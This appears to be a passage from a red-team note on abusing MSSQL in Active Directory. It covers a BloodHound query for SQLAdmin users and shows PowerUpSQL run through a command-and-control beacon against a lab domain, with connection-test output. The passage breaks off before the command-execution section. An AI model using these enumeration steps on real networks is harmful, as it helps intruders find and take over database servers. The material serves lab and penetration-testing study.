Microsoft SQL (MSSQL) is a database management system similar to MySQL, but on Windows hosts.

We can abuse MSSQL if we can control the SQL server or if we have access to a SQL server with a link to a different MSSQL server.

Tools

Enumeration

Bloodhound

We can query bloodhound to find users that can control MSSQL server by using the cyper:

MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p

Or we can also look for OU/Groups with sql in the name.

Testing connection

PowerUpSQL

Once we know using what user we can control the MSSQL server, and we have access to the user, we can use the tool PowerUpSQL to test the connection

beacon> powershell-import /opt/PowerUpSQL/PowerUpSQL.ps1
[*] Tasked beacon to import: /opt/PowerUpSQL/PowerUpSQL.ps1
[+] host called home, sent: 201904 bytes

beacon> powershell Get-SQLInstanceDomain | Get-SQLConnectionTest
[*] Tasked beacon to run: Get-SQLInstanceDomain | Get-SQLConnectionTest
[+] host called home, sent: 393 bytes
[+] received output:
#< CLIXML

ComputerName          Instance                   Status        
------------          --------                   ------        
sql01.rastalabs.local sql01.rastalabs.local,1433 Accessible    
sql01.rastalabs.local sql01.rastalabs.local      Accessible    
sql02.rastalabs.local sql02.rastalabs.local,1433 Not Accessible
sql02.rastalabs.local sql02.rastalabs.local      Not Accessible

SharpSQL

Link: https://github.com/mlcsec/SharpSQL

SharpSQL.exe Get-SQLInstanceDomain

Execute commands

Using PowerUpSQL we can test our access to the server by running a query on the database: